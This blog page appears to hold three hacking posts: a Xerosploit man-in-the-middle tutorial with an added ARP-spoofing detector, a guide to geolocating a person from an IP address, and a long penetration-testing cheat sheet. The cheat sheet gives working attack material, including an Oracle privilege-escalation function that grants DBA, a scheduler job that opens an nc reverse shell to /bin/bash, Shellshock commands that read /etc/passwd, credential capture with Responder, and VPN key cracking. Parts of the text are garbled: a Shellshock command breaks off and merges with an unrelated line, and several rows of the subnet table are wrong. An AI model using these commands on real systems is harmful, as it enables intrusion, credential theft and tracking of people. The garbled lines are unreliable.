
Wednesday, July 10, 2019

MITM with Xerosploit

Welcome to Hacking a Rise. In this post we are going to show you how to perform a man-in-the-middle attack with a tool called Xerosploit. This tool was designed by LionSec.

What is Xerosploit

Xerosploit is a penetration testing toolkit whose goal is to perform man-in-the-middle attacks for testing purposes. It brings various modules that allow you to carry out efficient attacks, and it also allows you to carry out denial of service attacks and port scanning. Powered by bettercap and nmap.

How to install Xerosploit

git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py


Using Xerosploit

Now that we have it installed, we can run it by typing xerosploit in the terminal.

Now we type help for the list of commands.

Our first command is iface, which tells you your network interface.

Now we type gateway to check that our gateway is set correctly.

Now we look for targets on the network, so we type scan.

The target I'm picking is my phone, 192.168.8.100, so type it into the terminal.

Now this brings us to the modules, so type help.

MODULES

  • portscanner : Port Scanner
  • dos : DoS Attack
  • ping : Ping Request
  • injecthtml : Inject HTML code
  • injectjs : Inject JavaScript code
  • rdownload : Replace files being downloaded
  • sniff : Capture information inside network packets
  • dspoof : Redirect all the HTTP traffic to the specified IP
  • yplay : Play background sound in target browser
  • replace : Replace all web page images with your own
  • driftnet : View all images requested by your targets
  • move : Shake web browser content
  • deface : Overwrite all web pages with your HTML code

    We are going to use sniff, so type sniff and then run. A little terminal will open up; this is where our target's data will be displayed.

    Now to cancel, press ctrl+c and type back to go back to the menu.

    Then all you have to do is pick another module and run it 🙂 There ya have it, lads.
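    The attack above works by ARP spoofing: bettercap, which Xerosploit is built on, poisons the target's ARP cache so that traffic meant for the gateway passes through the attacker's machine. From the defender's side that poisoning is visible in the victim's own ARP table. The script below is an added example (not part of Xerosploit or this post): it parses two constructed `arp -n` style snapshots, a known-good baseline and one taken during an attack, and flags the two tell-tale symptoms, the gateway's MAC changing and one MAC answering for several IPs. Interface names and MAC addresses are made up.

```python
"""Detect ARP-cache anomalies left behind by an ARP-spoofing MITM.

Added example for this post; the ARP table text is constructed to look
like Linux `arp -n` output and all MAC addresses are made up.
"""
import re
from collections import defaultdict

# Constructed baseline snapshot, taken while the network is known-good.
BASELINE_ARP = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.8.1              ether   02:00:00:aa:00:01   C                     wlan0
192.168.8.100            ether   02:00:00:aa:01:00   C                     wlan0
192.168.8.120            ether   02:00:00:aa:01:20   C                     wlan0
"""

# Constructed snapshot during an attack: the gateway IP now maps to the
# MAC of 192.168.8.120, i.e. that host is impersonating the gateway.
POISONED_ARP = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.8.1              ether   02:00:00:aa:01:20   C                     wlan0
192.168.8.100            ether   02:00:00:aa:01:00   C                     wlan0
192.168.8.120            ether   02:00:00:aa:01:20   C                     wlan0
"""

_ARP_LINE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+ether\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b", re.IGNORECASE)


def parse_arp_table(text):
    """Return {ip: mac} from `arp -n` style output; incomplete entries and
    the header line do not match the pattern and are skipped."""
    table = {}
    for line in text.splitlines():
        m = _ARP_LINE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def detect_arp_spoofing(baseline, current, gateway_ip):
    """Compare a current ARP table against a known-good baseline.

    Returns a list of (severity, message) findings for:
      * the gateway's MAC differing from the baseline (classic MITM symptom);
      * any MAC answering for more than one IP (the attacker's NIC claims
        both its own address and the one it is spoofing);
      * any other host whose MAC changed since the baseline.
    """
    findings = []
    gw_old, gw_new = baseline.get(gateway_ip), current.get(gateway_ip)
    if gw_old and gw_new and gw_old != gw_new:
        findings.append(("high", f"gateway {gateway_ip} MAC changed {gw_old} -> {gw_new}"))

    ips_by_mac = defaultdict(list)
    for ip, mac in current.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(("high", f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}"))

    for ip, mac in current.items():
        if ip != gateway_ip and ip in baseline and baseline[ip] != mac:
            findings.append(("medium", f"host {ip} MAC changed {baseline[ip]} -> {mac}"))
    return findings


def scan_for_spoofing(baseline_text, current_text, gateway_ip):
    """Parse both snapshots and return the findings."""
    return detect_arp_spoofing(parse_arp_table(baseline_text),
                               parse_arp_table(current_text), gateway_ip)


if __name__ == "__main__":
    for severity, msg in scan_for_spoofing(BASELINE_ARP, POISONED_ARP, "192.168.8.1"):
        print(f"[{severity}] {msg}")
```

    A static ARP entry for the gateway, or dynamic ARP inspection on a managed switch, is the usual mitigation once this is seen.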

    Disclaimer

    Hackingarise does not take responsibility for the actions you may commit with this tool and/or knowledge!! We make these posts for educational purposes and to teach how hackers can use certain tools to hack you, and we do not try to inspire any blackhat activities in doing so!!

    Final thoughts

    Xerosploit is a handy little tool for noobs that don't yet understand the way man-in-the-middle attacks work; the script is simple to use and install.

    Right lads, that's it. Hope you enjoyed it and see you in the next one. laughingman

    Sunday, June 23, 2019

    Get a location with an IP address

    Get a Location using an IP address

     

    Hey guys! Lasr here 🙂

    Today I'm going to show you how to get the approximate location of an IP with iplocation.net.

    For this tutorial you will need: a computer/smartphone/tablet with any OS on it, an internet connection and some photo editing software.

    SPOILER: you can't get someone's exact position with such simple tools; if you want their house address, then search on their full name and find their house by name.

    First of all you need an IP; you can get it either via an IP grabber or via an IP finder (tutorial for a Python IP finder here).

    Then go to iplocation.net, put the IP in the text input area at the top (step 1) and click "IP Lookup" to the right of the input.

    After that, wait until the geolocation data from the three sites below loads. As you can see, we already have 3 locations for the IP: 2 from the same city (Las Vegas) and 1 from New York. Why, you might ask? Because each site reports the location of the closest antenna it knows of for that IP.

    If you just want the country, you can stop here; if you want the region, or the city if you're lucky enough, then go further.

    I will cover 2 techniques:
    – the average (better when the points form a line)
    – the triangulation (better for more than 2 points on the map)

    First, the average: it consists of averaging the coordinates (thanks, Captain Obvious, lmao).
    It's better for 2 points, or in some cases for more (when we have points at the start and end of a line but none inside it), as in my example.

    1st Step:
    Open this site and enter the latitudes first in the text input box as shown below (1).
    Then copy the sum (2), open notepad and paste it.
    Then do exactly the same for the longitudes.

    2nd Step :

    For the 2nd and last step, put the latitude and longitude into Google Maps and see the result.

    And boom! You're done! Now let's get to the 2nd method, map triangulation.

    1st Step :

    Open Google Maps and paste the 1st location, then zoom out until you can see the whole country (if the results are all from the same country; otherwise zoom out until you can see all of the countries listed on iplocation.net for the IP).
    Take a screenshot, download it, and do the same for all of the other locations.

    2nd Step :

    Then link all of your results with lines and take the location where the lines cross.
    Red = the 3 locations
    Blue = triangulation method
    Green = average method

    As I said, my points form a line, so this method isn't effective in my case: there is no crossing, just a random point on the line.

     

    If you have a triangle, mark the midpoint of each of the 3 sides and link each of the old points to the new ones, as shown below.

    A, B, C = Location Points

    A', B', C' = New Points
    F = Point made by the triangulation

    If the lines don't cross at a single point but form a smaller triangle, repeat the process.
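    The two combining methods above, worked through in code as an added example (not part of the original post). The three coordinates are constructed stand-ins for the post's lookups (two near Las Vegas, one in New York), not its real values. It also shows the case the post warns about: three points on a straight line give no crossing, and for a genuine triangle the median lines cross at the coordinate average, so the two methods agree.

```python
"""Averaging and median-based 'triangulation' of geolocation lookups.

Added example; the coordinates are constructed, not the post's real data.
Averaging lat/lon treats the map as flat, which is fine for a rough
estimate at this scale but not for precise geodesy.
"""

# Constructed (lat, lon) results for the three geolocation sites.
LOOKUPS = [
    (36.17, -115.14),  # Las Vegas, site 1
    (36.11, -115.17),  # Las Vegas, site 2
    (40.71, -74.01),   # New York, site 3
]


def average_point(points):
    """Method 1: the plain average of the latitudes and of the longitudes."""
    n = len(points)
    return (sum(p[0] for p in points) / n, sum(p[1] for p in points) / n)


def midpoint(p, q):
    return ((p[0] + q[0]) / 2, (p[1] + q[1]) / 2)


def line_intersection(p1, p2, q1, q2):
    """Intersection of the infinite lines p1-p2 and q1-q2, or None if they
    are parallel or degenerate (the 'all on one line' case in the post)."""
    (x1, y1), (x2, y2), (x3, y3), (x4, y4) = p1, p2, q1, q2
    denom = (x1 - x2) * (y3 - y4) - (y1 - y2) * (x3 - x4)
    if abs(denom) < 1e-12:
        return None
    t = ((x1 - x3) * (y3 - y4) - (y1 - y3) * (x3 - x4)) / denom
    return (x1 + t * (x2 - x1), y1 + t * (y2 - y1))


def triangulate(a, b, c):
    """Method 2: join each corner to the midpoint of the opposite side
    (A to A', B to B') and take the point where those lines cross.
    Returns None when the three points are collinear."""
    a_prime = midpoint(b, c)
    b_prime = midpoint(a, c)
    return line_intersection(a, a_prime, b, b_prime)


def close(p, q, tol=1e-9):
    """True if two points are within tol on both axes (None never matches)."""
    return (p is not None and q is not None
            and abs(p[0] - q[0]) < tol and abs(p[1] - q[1]) < tol)


if __name__ == "__main__":
    avg = average_point(LOOKUPS)
    tri = triangulate(*LOOKUPS)
    print("average      :", avg)
    print("triangulation:", tri)
    # The medians of a triangle meet at its centroid, which is the
    # coordinate average, so for three points both methods agree.
    print("same point   :", close(avg, tri, 1e-6))
```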

    Hopefully you now know how to find the location of an IP address! 🙂

    And that’s it, Lasr out !

    Sunday, June 16, 2019

    Pentesters Cheat Sheet Part 1

    This is a quick reference, high level overview for typical penetration testing engagements. It is designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test. For more in-depth information I'd recommend the man page for the tool or a more specific pen testing cheat sheet from the menu on the right.

    The focus of this cheat sheet is infrastructure / network penetration testing; web application penetration testing is not covered here apart from a few sqlmap commands at the end and some web server enumeration. For web application penetration testing, check out the Web Application Hacker's Handbook; it is excellent for both learning and reference.

    This was brought to you by John Poli Modica; find his site here.

    Pre-engagement

    Network Configuration:

    Set IP Address.
    ifconfig eth0 xxx.xxx.xxx.xxx/24

    Subnetting:

    ipcalc xxx.xxx.xxx.xxx/24
    ipcalc xxx.xxx.xxx.xxx 255.255.255.0

    OSINT

    Passive Information Gathering:

    DNS:

    WHOIS enumeration.
    whois domain-name-here.com

    Perform DNS IP Lookup.
    dig a domain-name-here.com @nameserver

    Perform MX Record Lookup.
    dig mx domain-name-here.com @nameserver

    Perform Zone Transfer with DIG.
    dig axfr domain-name-here.com @nameserver

    DNS Zone Transfers:

    Windows DNS zone transfer.
    nslookup -> set type=any -> ls -d blah.com

    Linux DNS zone transfer.
    dig axfr blah.com @ns1.blah.com

    Email:

    Simply Email:
    Use SimplyEmail to enumerate all the online places (GitHub, target site etc.); it works better if you use proxies or set long throttle times so Google doesn't think you're a robot and make you fill out a CAPTCHA.

    git clone https://github.com/killswitch-GUI/SimplyEmail.git
    ./SimplyEmail.py -all -e TARGET-DOMAIN

    SimplyEmail can verify the discovered email addresses after gathering.

    Semi Active Information Gathering:

    Basic Finger Printing:
    Manual finger printing / banner grabbing.


    Basic versioning / finger printing via displayed banner
    nc -v 192.168.1.1 25
    telnet 192.168.1.1 25

    Banner grabbing with NC.
    nc TARGET-IP 80
    GET / HTTP/1.1
    Host: TARGET-IP
    User-Agent: Mozilla/5.0
    Referer: meh-domain

    Active Information Gathering

    DNS Bruteforce:

    DNSRecon:

    DNS Enumeration Kali – DNSRecon:

    root:# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

    Port Scanning:

    Nmap Commands:
    For more commands, see the Nmap cheat sheet in another post.

    Basic Nmap Commands:

    Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services.
    nmap -v -sS -A -T4 target

    As above but scans all TCP ports (takes a lot longer).
    nmap -v -sS -p- -A -T4 target

    As above but scans all TCP ports and UDP scan (takes even longer).
    nmap -v -sU -sS -p- -A -T4 target

    Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may knock the target over.
    nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X

    Search nmap scripts for keywords.
    ls /usr/share/nmap/scripts/* | grep ftp

    I've had a few people mention T4 scans; apply common sense here. Don't use T4 on external pen tests (when using an Internet connection); you're probably better off using T2 with a TCP connect scan. A T4 scan would likely be better suited to an internal pen test, over low latency links with plenty of bandwidth. But it all depends on the target devices: embedded devices are going to struggle if you T4 / T5 them and give inconclusive results. As a general rule of thumb, scan as slowly as you can, or do a fast scan of the top 1000 ports so you can start pen testing, then kick off a slower scan.

    Nmap UDP Scanning:
    nmap -sU TARGET

    UDP Protocol Scanner:
    git clone https://github.com/portcullislabs/udp-proto-scanner.git

    Scan a file of IP addresses for all services:
    ./udp-protocol-scanner.pl -f ip.txt

    Scan for a specific UDP service:
    udp-proto-scanner.pl -p ntp -f ips.txt

    Other Host Discovery
    Other methods of host discovery, that don’t use nmap…

    Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site.
    netdiscover -r 192.168.1.0/24

    Enumeration & Attacking Network Services:
    Penetration testing tools that specifically identify and / or enumerate network services:

    Samba / SMB / Windows Domain Enumeration:

    Samba Enumeration:

    SMB Enumeration Tools:
    nmblookup -A target
    smbclient //MOUNT/share -I target -N
    rpcclient -U "" target
    enum4linux target

    Also see, nbtscan cheat sheet in another post.

    Discover Windows / Samba servers on the subnet, find Windows MAC addresses and NetBIOS names, and discover the client workgroup / domain.
    nbtscan 192.168.1.0/24

    Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing.
    enum4linux -a target-ip

    Fingerprint SMB Version:
    smbclient -L //192.168.1.100

    Find open SMB Shares:
    nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

    Enumerate SMB Users:
    nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254

    python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX

    RID Cycling:
    ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

    Metasploit module for RID cycling:
    use auxiliary/scanner/smb/smb_lookupsid

    Manual Null session testing:
    Windows:
    net use \\TARGET\IPC$ "" /u:""

    Linux:
    smbclient -L //192.168.99.131

    NBTScan unixwiz
    Install on Kali rolling:

    apt-get install nbtscan-unixwiz
    nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan

    LLMNR / NBT-NS Spoofing:
    Steal credentials off the network.

    Metasploit LLMNR / NetBIOS requests
    Spoof / poison LLMNR / NetBIOS requests:

    auxiliary/spoof/llmnr/llmnr_response
    auxiliary/spoof/nbns/nbns_response
    Capture the hashes:

    auxiliary/server/capture/smb
    auxiliary/server/capture/http_ntlm

    You’ll end up with NTLMv2 hash, use john or hashcat to crack it.

    Responder.py:
    Alternatively you can use responder.

    git clone https://github.com/SpiderLabs/Responder.git
    python Responder.py -i local-ip -I eth0

    Run Responder.py for the whole engagement
    Run Responder.py for the length of the engagement while you’re working on other attack vectors.

    SNMP Enumeration Tools:
    A number of SNMP enumeration tools.

    Fix SNMP output values so they are human readable:

    apt-get install snmp-mibs-downloader download-mibs
    echo "" > /etc/snmp/snmp.conf

    SNMP enumeration.
    snmpcheck -t 192.168.1.X -c public

    snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f

    snmpenum -t 192.168.1.X

    onesixtyone -c names -i hosts

    SNMPv3 Enumeration Tools
    Identify SNMPv3 servers with nmap:
    nmap -sV -p 161 --script=snmp-info TARGET-SUBNET

    Rory McCune’s snmpwalk wrapper script helps automate the
    username enumeration process for SNMPv3:

    apt-get install snmp snmp-mibs-downloader
    wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb

    *Use Metasploit's Wordlist
    Metasploit’s wordlist (KALI path below) has common credentials for v1 & 2 of SNMP, for newer credentials check out Daniel Miessler’s SecLists project on GitHub (not the mailing list!).

    /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

    R Services Enumeration:
    This is legacy, included for completeness.

    nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:

    RSH Enumeration
    RSH Run Commands:
    rsh

    Metasploit RSH Login Scanner:
    auxiliary/scanner/rservices/rsh_login

    rusers Show Logged in Users:
    rusers -al 192.168.2.1

    rusers scan whole Subnet:
    rlogin -l

    e.g. rlogin -l root TARGET-SUBNET/24

    Finger Enumeration:
    finger @TARGET-IP

    Finger a Specific Username:
    finger batman@TARGET-IP

    Solaris bug that shows all logged in users:
    finger 0@host

    SunOS: RPC services allow user enum:
    $ rusers # users logged onto LAN

    finger 'a b c d e f g h'@sunhost

    rwho:
    Use nmap to identify machines running rwhod (513 UDP).

    TLS & SSL Testing:

    testssl.sh:

    Test all the things on a single host and output to a .html file:

    ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html

    Vulnerability Assessment:
    Install OpenVAS 8 on Kali Rolling:

    apt-get update
    apt-get dist-upgrade -y
    apt-get install openvas
    openvas-setup

    Verify openvas is running using:
    netstat -tulpn

    Login at https://127.0.0.1:9392 – credentials are generated during openvas-setup.

    Database Penetration Testing:
    Attacking database servers exposed on the network.

    Oracle:
    Install oscanner:
    apt-get install oscanner

    Run oscanner:
    oscanner -s 192.168.1.200 -P 1521

    Fingerprint Oracle TNS Version:

    Install tnscmd10g:
    apt-get install tnscmd10g

    Fingerprint oracle tns:
    tnscmd10g version -h TARGET
    nmap --script=oracle-tns-version

    Brute force oracle user accounts
    Identify default Oracle accounts:
    nmap --script=oracle-sid-brute
    nmap --script=oracle-brute

    Run nmap scripts against Oracle TNS:
    nmap -p 1521 -A TARGET

    Oracle Privilege Escalation:
    Requirements:

    -Oracle needs to be exposed on the network
    -A default account is in use like scott

    Quick overview of how this works:

    1 Create the function

    2 Create an index on table SYS.DUAL

    3 The index we just created executes our function SCOTT.DBA_X

    4 The function will be executed by SYS user (as that’s the user that owns the table).
    5 Create an account with DBA privileges

    In the example below the user SCOTT is used but this should be possible with another default Oracle account.

    Identify default accounts within oracle db using NMAP NSE scripts:
    nmap --script=oracle-sid-brute
    nmap --script=oracle-brute

    Login using the identified weak account (assuming you find one).

    How to identify the current privilege level for an oracle user:
    SQL> select * from session_privs;

    SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid current_user is
    pragma autonomous_transaction;
    begin
    execute immediate 'grant dba to user1 identified by pass1';
    commit;
    return 'FOO';
    end;

    Oracle priv esc and obtain DBA access:
    Run netcat:
    netcat -nvlp 443

    SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
    Run the exploit with a select query:
    SQL> Select * from session_privs;
    You should have a DBA user with creds user1 and pass1.

    Verify you have DBA privileges by re-running the first command again.

    Remove the exploit using:
    drop index exploit_1337;

    Get Oracle Reverse os-shell (the job name must match in every call; the original mixed two names):
    begin
    dbms_scheduler.create_job( job_name => 'MEH1337',job_type =>
    'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
    SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
    dbms_scheduler.set_job_argument_value('MEH1337', 1, 'TARGET-IP');
    dbms_scheduler.set_job_argument_value('MEH1337', 2, '443');
    dbms_scheduler.set_job_argument_value('MEH1337', 3, '-e');
    dbms_scheduler.set_job_argument_value('MEH1337', 4, '/bin/bash');
    dbms_scheduler.enable('MEH1337');
    end;

    MSSQL:
    Enumeration / Discovery:

    Nmap:
    nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

    Metasploit:
    msf > use auxiliary/scanner/mssql/mssql_ping

    *Use MS SQL Servers Browse For More:
    Try using “Browse for More” via MS SQL Server Management Studio.

    Bruteforce MSSQL Login:
    msf > use auxiliary/admin/mssql/mssql_enum

    Metasploit MSSQL Shell:
    msf > use exploit/windows/mssql/mssql_payload
    msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

    Network:
    Plink.exe Tunnel:
    PuTTY Link tunnel

    Forward remote port to local address:

    plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP

    Pivoting:

    SSH Pivoting:
    ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip

    Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

    SSH pivoting from one network to another:

    ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1

    Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

    proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2

    Add socks4 127.0.0.1 1011 in /etc/proxychains.conf

    Meterpreter Pivoting:
    TTL Finger Printing:

    OPERATING SYSTEM    TTL SIZE
    Windows             128
    Linux               64
    Solaris             255
    Cisco / Network     255

    IPv4 Cheat Sheets:
    Classful IP Ranges:
    E.g. Class A, B, C (deprecated)

    CLASS    IP ADDRESS RANGE
    Class A  0.0.0.0 – 127.255.255.255
    Class B  128.0.0.0 – 191.255.255.255
    Class C  192.0.0.0 – 223.255.255.255
    Class D  224.0.0.0 – 239.255.255.255
    Class E  240.0.0.0 – 255.255.255.255

    IPv4 Private Address Ranges:
    CLASS              RANGE
    Class A Private    10.0.0.0 – 10.255.255.255
    Class B Private    172.16.0.0 – 172.31.255.255
    Class C Private    192.168.0.0 – 192.168.255.255
    Loopback           127.0.0.0 – 127.255.255.255

    IPv4 Subnet Cheat Sheet:
    Subnet cheat sheet, not really related to pen testing but a useful reference.

    CIDR DECIMAL MASK NUMBER OF HOSTS
    /31 255.255.255.254 1 Host
    /30 255.255.255.252 2 Hosts
    /29 255.255.255.249 6 Hosts
    /28 255.255.255.240 4 Hosts
    /27 255.255.255.224 30 Hosts
    /26 255.255.255.192 62 Hosts
    /25 255.255.255.128 126 Hosts
    /24 255.255.255.0 254 Hosts
    /23 255.255.254.0 512 Hosts
    /22 255.255.252.0 1022 Hosts
    /21 255.255.248.0 2046 Hosts
    /20 255.255.240.0 4094 Hosts
    /19 255.255.224.0 8190 Hosts
    /18 255.255.192.0 16382 Hosts
    /17 255.255.128.0 32766 Hosts
    /16 255.255.0.0 65534 Hosts
    /15 255.254.0.0 131070 Hosts
    /14 255.252.0.0 262142 Hosts
    /13 255.248.0.0 524286 Hosts
    /12 255.240.0.0 1048674 Hosts
    /11 255.224.0.0 2097150 Hosts
    /10 255.192.0.0 4194302 Hosts
    /9 255.128.0.0 8388606 Hosts
    /8 255.0.0.0 16777214 Hosts
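    A small calculator, added here as an example and not part of the original cheat sheet, that derives each row of the tables above from the prefix length using Python's standard library, so a row can be checked before relying on it: a few entries above do not agree with what it computes (the /29 mask and the /28, /23 and /12 host counts), and it treats /31 as a two-host point-to-point link per RFC 3021 where the table lists 1.

```python
"""CIDR helper for the subnet and address-class tables in the cheat sheet.

Added example; it uses only the ipaddress module from the standard library.
"""
import ipaddress


def prefix_to_mask(prefix):
    """Dotted-decimal netmask for an IPv4 prefix, e.g. 29 -> 255.255.255.248."""
    if not 0 <= prefix <= 32:
        raise ValueError("IPv4 prefix must be 0..32")
    return str(ipaddress.ip_network(f"0.0.0.0/{prefix}").netmask)


def usable_hosts(prefix):
    """Usable host addresses in an IPv4 block.

    /32 is a single host and /31 is a two-host point-to-point link
    (RFC 3021); every larger block loses the network and broadcast address.
    """
    total = 2 ** (32 - prefix)
    return total if prefix >= 31 else total - 2


def classful_class(ip):
    """Legacy class (A-E) from the first octet, as in the classful table."""
    first = int(ipaddress.IPv4Address(str(ip))) >> 24
    if first < 128:
        return "A"
    if first < 192:
        return "B"
    if first < 224:
        return "C"
    if first < 240:
        return "D"
    return "E"


def describe(cidr):
    """Network, broadcast, mask, host count and private/loopback flags
    for any host/prefix string such as 192.168.1.37/24."""
    net = ipaddress.ip_network(cidr, strict=False)
    return {
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "mask": str(net.netmask),
        "hosts": usable_hosts(net.prefixlen),
        "class": classful_class(net.network_address),
        # ipaddress counts 127/8 as private too, so split the two flags.
        "private": net.is_private and not net.is_loopback,
        "loopback": net.is_loopback,
    }


def subnet_table(smallest=31, largest=8):
    """Rows equivalent to the cheat sheet table: (cidr, mask, usable hosts)."""
    return [(f"/{p}", prefix_to_mask(p), usable_hosts(p))
            for p in range(smallest, largest - 1, -1)]


if __name__ == "__main__":
    for cidr, mask, hosts in subnet_table():
        print(f"{cidr:<4} {mask:<16} {hosts} hosts")
    print(describe("192.168.1.37/24"))
```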

    VLAN Hopping:
    Using NCC Group's VLAN wrapper script for Yersinia simplifies the process.

    git clone https://github.com/nccgroup/vlan-hopping.git
    chmod 700 frogger.sh
    ./frogger.sh

    VPN Pentesting Tools:
    Identify VPN servers:
    ./udp-protocol-scanner.pl -p ike TARGET(s)

    Scan a range for VPN servers:
    ./udp-protocol-scanner.pl -p ike -f ip.txt

    IKEForce:
    Use IKEForce to enumerate or dictionary attack VPN servers.

    Install:
    pip install pyip
    git clone https://github.com/SpiderLabs/ikeforce.git

    Perform IKE VPN enumeration with IKEForce:
    ./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic

    Bruteforce IKE VPN using IKEForce:
    ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
    ike-scan
    ike-scan TARGET-IP
    ike-scan -A TARGET-IP
    ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key

    IKE Aggressive Mode PSK Cracking:
    1 Identify VPN Servers
    2 Enumerate with IKEForce to obtain the group ID
    3 Use ike-scan to capture the PSK hash from the IKE endpoint
    4 Use psk-crack to crack the hash

    Step 1: Identify IKE Servers
    ./udp-protocol-scanner.pl -p ike SUBNET/24

    Step 2: Enumerate group name with IKEForce
    ./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic

    Step 3: Use ike-scan to capture the PSK hash
    ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP

    Step 4: Use psk-crack to crack the PSK hash
    psk-crack hash-file.txt

    Some more advanced psk-crack options below:

    psk-crack -b 5 TARGET-IP-key
    psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
    psk-crack -d /path/to/dictionary-file TARGET-IP-key

    PPTP Hacking:
    Identifying PPTP, it listens on TCP: 1723

    NMAP PPTP Fingerprint:
    nmap -Pn -sV -p 1723 TARGET(S)

    PPTP Dictionary Attack:
    thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

    DNS Tunneling:
    Tunneling data over DNS to bypass firewalls.

    dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.

    Attacking Machine:

    Installation:
    apt-get update
    apt-get -y install ruby-dev git make g++
    gem install bundler
    git clone https://github.com/iagox86/dnscat2.git
    cd dnscat2/server
    bundle install

    Run dnscat2:
    ruby ./dnscat2.rb
    dnscat2> New session established: 1422
    dnscat2> session -i 1422

    Target Machine:
    https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/

    dnscat –host

    BOF / Exploit:
    Exploit Research:
    Find exploits for enumerated hosts / services.

    Search exploit-db for exploit, in this example windows 2003 + local esc.
    searchsploit windows 2003 | grep -i local

    Use google to search exploit-db.com for exploits.
    site:exploit-db.com exploit kernel <= 3

    Search metasploit modules using grep - msf search sucks a bit.
    grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*

    Searching for Exploits:
    Install local copy of exploit-db:
    searchsploit -u
    searchsploit apache 2.2
    searchsploit "Linux Kernel"
    searchsploit linux 2.6 | grep -i ubuntu | grep local

    Compiling Windows Exploits on Kali:
    wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
    wine mingw-get-setup.exe
    select mingw32-base
    cd /root/.wine/drive_c/windows
    wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
    cd /root/.wine/drive_c/MinGW/bin
    wine gcc -o ability.exe /tmp/exploit.c -lwsock32
    wine ability.exe

    Cross Compiling Exploits:
    gcc -m32 -o output32 hello.c (32 bit)
    gcc -m64 -o output hello.c (64 bit)

    Exploiting Common Vulnerabilities:
    Exploiting Shellshock:
    A tool to find and exploit servers vulnerable to Shellshock:
    git clone https://github.com/nccgroup/shocker
    ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

    cat file (view file contents):
    echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$( 80, :DocumentRoot => Dir.pwd).start”

    Run a basic PHP http server
    php -S 0.0.0.0:80

    Mounting File Shares:
    How to mount NFS / CIFS, Windows and Linux file shares.

    Mount NFS share to /mnt/nfs.
    mount 192.168.1.1:/vol/share /mnt/nfs

    Mount Windows CIFS / SMB share on Linux at /mnt/cifs; if you remove the password it will prompt on the CLI (more secure, as it won't end up in bash_history).
    mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs

    Mount a Windows share on Windows from the command line.
    net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no

    Install smb4k on Kali, a useful Linux GUI for browsing SMB shares.
    apt-get install smb4k -y

    HTTP / HTTPS Webserver Enumeration:
    Perform a nikto scan against target.
    nikto -h 192.168.1.1

    Configure via GUI, CLI input doesn’t work most of the time.
    dirbuster

    Packet Inspection:
    tcpdump for port 80 on interface eth0, outputs to output.pcap
    tcpdump tcp port 80 -w output.pcap -i eth0

    Username Enumeration:
    Some techniques used to remotely enumerate users on a target system.

    SMB User Enumeration:
    Enumerate users from SMB.
    python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX

    RID cycle SMB / enumerate users from SMB.
    ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

    SNMP User Enumeration:
    Enumerate users from SNMP.
    snmpwalk -c public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4

    Enumerate users from SNMP.
    python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX

